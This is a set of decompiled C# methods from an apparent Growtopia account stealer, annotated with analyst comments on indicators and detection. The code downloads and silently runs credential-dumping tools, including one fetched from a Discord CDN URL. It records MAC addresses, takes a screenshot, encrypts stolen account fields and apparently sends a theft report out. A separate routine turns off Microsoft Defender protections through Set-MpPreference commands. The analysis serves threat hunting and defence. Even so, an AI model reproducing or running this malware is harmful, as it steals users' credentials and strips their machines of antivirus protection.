Exemplo n.º 1
        // Token: 0x06000009 RID: 9 RVA: 0x00002C74 File Offset: 0x00000E74
        // Analyst summary (decompiled sample): downloads a second-stage executable into
        // %TEMP%, runs it with a hidden window so that it writes its output to a text
        // file, then deletes both files and returns the text to the caller.
        //
        // Returns: the full contents of %TEMP%\credentialslmao.txt as written by the
        // downloaded tool.
        //
        // Host artifacts visible in this method (useful for hunting / triage):
        //   - %TEMP%\resourcefilehaha.exe   (dropped, executed, deleted after ~5 s)
        //   - %TEMP%\credentialslmao.txt    (tool output, read then deleted)
        //   - child process command line containing "/C /stext "
        // Nothing in this method catches exceptions, so if any step throws, the files
        // created before that point are not removed by this method.
        private static string DINGDONGGETTROLL()
        {
            string    text      = Environment.ExpandEnvironmentVariables("%TEMP%");
            WebClient webClient = new WebClient();

            // The download URL is not stored in clear text: it is produced at run time by
            // Executable.SUCKDICKXD from the Base64 blob below. That helper is not shown
            // here; presumably it decrypts/deobfuscates the string -- confirm against the
            // helper before treating the blob as an indicator on its own.
            webClient.DownloadFile(Executable.SUCKDICKXD("CW/PsKH5sxTA0WGmJaxxW1ML+wT8q90jrto/c7dDT2qpe/RLNvNoRsub28By1W82Y2d0V7rQGgEj9trh+a3AIbT/Z2/izeQvy1ntGG4lya3YSpfVpW8G+500Yecb6tYEBQuTV4kkvzbjp5q8276S65gwBQJ/dFTo2ruNnKyOV6PDfRtZ5UzH106UnQJbdjKMh/1ZVkmMjpDP8KWIUprbn7srzcR+qmWhfNc9ruueUTBIud63/BuLPxaT9QdzG1j6eP4Mc7Wj0sB784SXWjm6gQ=="), text + "\\resourcefilehaha.exe");
            webClient.Dispose();
            new Process
            {
                StartInfo = new ProcessStartInfo
                {
                    // Hidden window: the user sees no console or UI from the child.
                    WindowStyle = ProcessWindowStyle.Hidden,
                    FileName    = text + "\\resourcefilehaha.exe",
                    // NOTE(review): "/stext <file>" matches the save-to-text switch used by
                    // NirSoft-style recovery utilities; the identity of the payload cannot
                    // be established from this listing alone.
                    Arguments   = "/C /stext " + text + "\\credentialslmao.txt"
                }
            }.Start();
            // Fixed 5-second delay; the code does not wait on the child process itself.
            Thread.Sleep(5000);
            File.Delete(text + "\\resourcefilehaha.exe");
            string result = File.ReadAllText(text + "\\credentialslmao.txt");

            // Output file is removed after it has been read into memory.
            File.Delete(text + "\\credentialslmao.txt");
            return(result);
        }
Exemplo n.º 2
        // Token: 0x06000004 RID: 4 RVA: 0x0000215C File Offset: 0x0000035C
        // Analyst summary (decompiled sample): entry point of an information stealer.
        // In order, the visible code:
        //   1. records the MAC addresses of active network interfaces to a temp file,
        //   2. captures a screenshot of the primary screen to a temp file,
        //   3. collects the output of Executable.DINGDONGGETTROLL() into a temp file,
        //   4. downloads and runs a second executable ("savedecoder.exe") and, if it
        //      produces pwd.txt, re-encodes three fields from it into a ".cbuilder" file,
        //   5. hands the file and a report message to an IFOUGHTINWW1 object, and
        //   6. deletes the temp files it created.
        // Every stage is wrapped in an empty catch, so failures are silent and the
        // program continues or exits without any visible error.
        //
        // Several lines below are bare expressions with no assignment (for example a
        // string concatenation followed by ';'). These are decompiler artifacts: the
        // values are computed and discarded, and the listing is not compilable as-is.
        //
        // Indicators that appear literally in this method:
        //   - %LOCALAPPDATA%\Temp\macs.txt, <user>screenshot.png, "<user> credentials.txt",
        //     pwd.txt, savedecoder.exe, *.cbuilder
        //   - the Discord CDN download URL for savedecrypter.exe
        //   - the hard-coded key string "kljsdooqlo4454GG"
        //   - the report prefix "[C-Builder] Account stolen from:: "
        private static void Main()
        {
            WebClient webClient = new WebClient();

            try
            {
                // Terminates any process returned for the name "savedecoder.exe" before
                // starting (the same name is used for the downloaded file further down).
                foreach (Process process in Process.GetProcessesByName("savedecoder.exe"))
                {
                    process.Kill();
                }
                // Hard-coded key, later passed to Executable.XXX and Executable.EncryptString.
                string key = "kljsdooqlo4454GG";
                // Decompiler artifact: path to the Growtopia save file is built and discarded.
                "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat";
                try
                {
                    // Stage 1: one line per interface that is Up and not loopback, each line
                    // being the physical (MAC) address as upper-case hex without separators.
                    StreamWriter streamWriter = new StreamWriter("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt");
                    foreach (NetworkInterface networkInterface in from nic in NetworkInterface.GetAllNetworkInterfaces()
                             where nic.OperationalStatus == OperationalStatus.Up && nic.NetworkInterfaceType != NetworkInterfaceType.Loopback
                             select nic)
                    {
                        string str = string.Join("", networkInterface.GetPhysicalAddress().GetAddressBytes().Select((byte b) => b.ToString("X2")));
                        streamWriter.Write(str + "\n");
                    }
                    streamWriter.Close();
                }
                catch
                {
                    // Errors are swallowed; macs.txt may be missing or partial.
                }
                try
                {
                    // Stage 2: full-size capture of the primary screen, saved under
                    // ...\AppData\Local\Temp\<user>screenshot.png (no separator between
                    // the user name and "screenshot.png").
                    Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
                    using (Graphics graphics = Graphics.FromImage(bitmap))
                    {
                        graphics.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
                        bitmap.Save(string.Concat(new string[]
                        {
                            "C:\\Users\\",
                            Environment.UserName,
                            "\\AppData\\Local\\Temp\\",
                            Environment.UserName,
                            "screenshot.png"
                        }));
                    }
                }
                catch
                {
                    // Errors are swallowed; the screenshot may not exist.
                }
                bool   attachments = true;
                string path        = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt";
                // Executable.DINGDONGDANG is not shown; its result is the value labelled
                // "IP address" in the report message assembled further down.
                string text        = Executable.DINGDONGDANG();
                string text2       = File.ReadAllText(path);
                string str2        = Environment.ExpandEnvironmentVariables("%TEMP%");
                // Decompiler artifacts: the next two expressions are computed and discarded.
                "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat";
                string.Concat(new string[]
                {
                    "C:\\Users\\",
                    Environment.UserName,
                    "\\AppData\\Local\\Temp\\",
                    Environment.UserName,
                    " pictures.zip"
                });
                string path2 = string.Concat(new string[]
                {
                    "C:\\Users\\",
                    Environment.UserName,
                    "\\AppData\\Local\\Temp\\",
                    Environment.UserName,
                    "screenshot.png"
                });
                // Stage 3: output of the downloaded tool run by DINGDONGGETTROLL is staged
                // on disk as "%TEMP%\<user> credentials.txt".
                string contents = Executable.DINGDONGGETTROLL();
                File.WriteAllText(str2 + "\\" + Environment.UserName + " credentials.txt", contents);
                // Decompiler artifact: value discarded.
                str2 + "\\" + Environment.UserName + " credentials.txt";
                IFOUGHTINWW1 ifoughtinww = new IFOUGHTINWW1();
                // NOTE(review): HANGURSELF is set from Executable.XXX(key, <Base64>). Neither
                // the helper nor the class is shown; presumably this is a decrypted
                // destination or credential used by the two calls below -- confirm.
                ifoughtinww.HANGURSELF = Executable.XXX(key, "GrWz5DcWMtfQ7dy+2aTGgQ==");
                try
                {
                    // Stage 4: second download, fetched over HTTPS from the Discord CDN and
                    // written to the temp directory under a different name (savedecoder.exe).
                    // The path is built with "//", so the string handed to the OS contains
                    // forward slashes after the temp directory.
                    webClient.DownloadFile("https://cdn.discordapp.com/attachments/775300885990998059/775459023562473512/savedecrypter.exe", Path.GetTempPath() + "//savedecoder.exe");
                    Process.Start(new ProcessStartInfo
                    {
                        WindowStyle = ProcessWindowStyle.Hidden,
                        FileName    = Path.GetTempPath() + "//savedecoder.exe"
                    });
                    // Fixed 2.5-second delay before looking for the tool's output file.
                    Thread.Sleep(2500);
                    if (File.Exists(Path.GetTempPath() + "//pwd.txt"))
                    {
                        // First read is discarded; the second read is split on '='.
                        File.ReadAllText(Path.GetTempPath() + "//pwd.txt");
                        string[] array = File.ReadAllText(Path.GetTempPath() + "\\pwd.txt").Split(new char[]
                        {
                            '='
                        });
                        // Three fields are taken by position. text3 is the value reported as
                        // "GrowID" below; the meaning of the other two is not stated in
                        // this listing.
                        string text3      = array[0];
                        string plainText  = array[1];
                        string plainText2 = array[2];
                        // The three fields are passed through Executable.EncryptString with the
                        // hard-coded key and written '|'-separated to %TEMP%\<GrowID>.cbuilder.
                        using (StreamWriter streamWriter2 = new StreamWriter(Path.GetTempPath() + "\\" + text3 + ".cbuilder"))
                        {
                            streamWriter2.Write(string.Concat(new string[]
                            {
                                Executable.EncryptString(key, text3),
                                "|",
                                Executable.EncryptString(key, plainText),
                                "|",
                                Executable.EncryptString(key, plainText2),
                                "|"
                            }));
                        }
                        // NOTE(review): XDLSD receives the .cbuilder path and file name, and
                        // XDLOLLMAO receives the report text plus the attachments flag.
                        // Their bodies are not shown; presumably these transmit the data
                        // off the host -- confirm against IFOUGHTINWW1.
                        ifoughtinww.XDLSD(Path.GetTempPath() + "\\" + text3 + ".cbuilder", text3 + ".cbuilder");
                        File.Delete(Path.GetTempPath() + "//pwd.txt");
                        File.Delete(Path.GetTempPath() + "//savedecoder.exe");
                        // Report text includes user name, machine name, GrowID, the
                        // DINGDONGDANG value and the collected MAC addresses.
                        ifoughtinww.XDLOLLMAO(string.Concat(new string[]
                        {
                            "[C-Builder] Account stolen from:: ",
                            Environment.UserName,
                            " / ",
                            Environment.MachineName,
                            "\nGrowID :: ",
                            text3,
                            "\nIP address:: ",
                            text,
                            "\nMac addresses:: \n",
                            text2
                        }), attachments);
                    }
                    // Stage 6: staged files are removed. The .cbuilder file is not deleted
                    // anywhere in this method.
                    if (File.Exists(str2 + "\\" + Environment.UserName + " credentials.txt"))
                    {
                        File.Delete(str2 + "\\" + Environment.UserName + " credentials.txt");
                    }
                    if (File.Exists(path))
                    {
                        File.Delete(path);
                    }
                    if (File.Exists(path2))
                    {
                        File.Delete(path2);
                    }
                    try
                    {
                        foreach (Process process2 in Process.GetProcessesByName("savedecoder.exe"))
                        {
                            process2.Kill();
                            // pass_decoder.exe is not created anywhere in the visible code.
                            File.Delete(Path.GetTempPath() + "\\pass_decoder.exe");
                        }
                    }
                    catch
                    {
                    }
                }
                catch
                {
                    // Any failure in the download/run/report stage is swallowed; cleanup
                    // inside the try above is skipped from the point of failure.
                }
                // Final cleanup pass, run whether or not the stage above succeeded.
                foreach (Process process3 in Process.GetProcessesByName("savedecoder.exe"))
                {
                    process3.Kill();
                }
                if (File.Exists(Path.GetTempPath() + "//pwd.txt"))
                {
                    File.Delete(Path.GetTempPath() + "//pwd.txt");
                }
                if (File.Exists(Path.GetTempPath() + "//savedecoder.exe"))
                {
                    File.Delete(Path.GetTempPath() + "//savedecoder.exe");
                }
            }
            catch
            {
                // Outermost swallow: the process ends without surfacing any error.
            }
        }
Exemplo n.º 3
        // Token: 0x06000006 RID: 6 RVA: 0x00002894 File Offset: 0x00000A94
        // Analyst summary (decompiled sample): Microsoft Defender tampering routine
        // (MITRE ATT&CK T1562.001, Impair Defenses: Disable or Modify Tools).
        // It runs "powershell Get-MpPreference -verbose" with no window, reads the output
        // line by line, and for each listed preference that is not already at the
        // weakened value it passes a matching "Set-MpPreference ..." string to
        // Executable.IDIOT. That helper is not shown; presumably it executes the string
        // through PowerShell -- confirm.
        //
        // Defensive notes:
        //   - Set-MpPreference changes of this kind require administrative rights and are
        //     blocked when Defender Tamper Protection is enabled.
        //   - Successful changes are recorded in the Microsoft-Windows-Windows Defender
        //     Operational log (event 5007 for configuration changes, 5001 when real-time
        //     protection is turned off).
        //   - Process telemetry: a non-interactive powershell child whose command line
        //     contains "Get-MpPreference", followed by "Set-MpPreference -Disable*".
        private static void WHYTFUSKID()
        {
            Process process = new Process
            {
                StartInfo = new ProcessStartInfo
                {
                    FileName               = "powershell",
                    Arguments              = "Get-MpPreference -verbose",
                    // Output is captured by the parent and no window is created.
                    UseShellExecute        = false,
                    RedirectStandardOutput = true,
                    WindowStyle            = ProcessWindowStyle.Hidden,
                    CreateNoWindow         = true
                }
            };

            process.Start();
            // Each output line is matched by prefix (setting name) and suffix (current
            // value). At most one branch fires per line.
            while (!process.StandardOutput.EndOfStream)
            {
                string text = process.StandardOutput.ReadLine();
                // Boolean "Disable*" settings: acted on only when currently False.
                if (text.StartsWith("DisableRealtimeMonitoring") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableRealtimeMonitoring $true");
                }
                else if (text.StartsWith("DisableBehaviorMonitoring") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableBehaviorMonitoring $true");
                }
                else if (text.StartsWith("DisableBlockAtFirstSeen") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableBlockAtFirstSeen $true");
                }
                else if (text.StartsWith("DisableIOAVProtection") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableIOAVProtection $true");
                }
                else if (text.StartsWith("DisablePrivacyMode") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisablePrivacyMode $true");
                }
                else if (text.StartsWith("SignatureDisableUpdateOnStartupWithoutEngine") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true");
                }
                else if (text.StartsWith("DisableArchiveScanning") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableArchiveScanning $true");
                }
                else if (text.StartsWith("DisableIntrusionPreventionSystem") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableIntrusionPreventionSystem $true");
                }
                else if (text.StartsWith("DisableScriptScanning") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableScriptScanning $true");
                }
                // Cloud settings: SubmitSamplesConsent 2 is "never send" and
                // MAPSReporting 0 is "disabled" in the Defender preference enums.
                else if (text.StartsWith("SubmitSamplesConsent") && !text.EndsWith("2"))
                {
                    Executable.IDIOT("Set-MpPreference -SubmitSamplesConsent 2");
                }
                else if (text.StartsWith("MAPSReporting") && !text.EndsWith("0"))
                {
                    Executable.IDIOT("Set-MpPreference -MAPSReporting 0");
                }
                // Threat default actions: value 6 is "Allow", so detections at every
                // severity level would be left in place rather than remediated.
                else if (text.StartsWith("HighThreatDefaultAction") && !text.EndsWith("6"))
                {
                    Executable.IDIOT("Set-MpPreference -HighThreatDefaultAction 6 -Force");
                }
                else if (text.StartsWith("ModerateThreatDefaultAction") && !text.EndsWith("6"))
                {
                    Executable.IDIOT("Set-MpPreference -ModerateThreatDefaultAction 6");
                }
                else if (text.StartsWith("LowThreatDefaultAction") && !text.EndsWith("6"))
                {
                    Executable.IDIOT("Set-MpPreference -LowThreatDefaultAction 6");
                }
                else if (text.StartsWith("SevereThreatDefaultAction") && !text.EndsWith("6"))
                {
                    Executable.IDIOT("Set-MpPreference -SevereThreatDefaultAction 6");
                }
            }
        }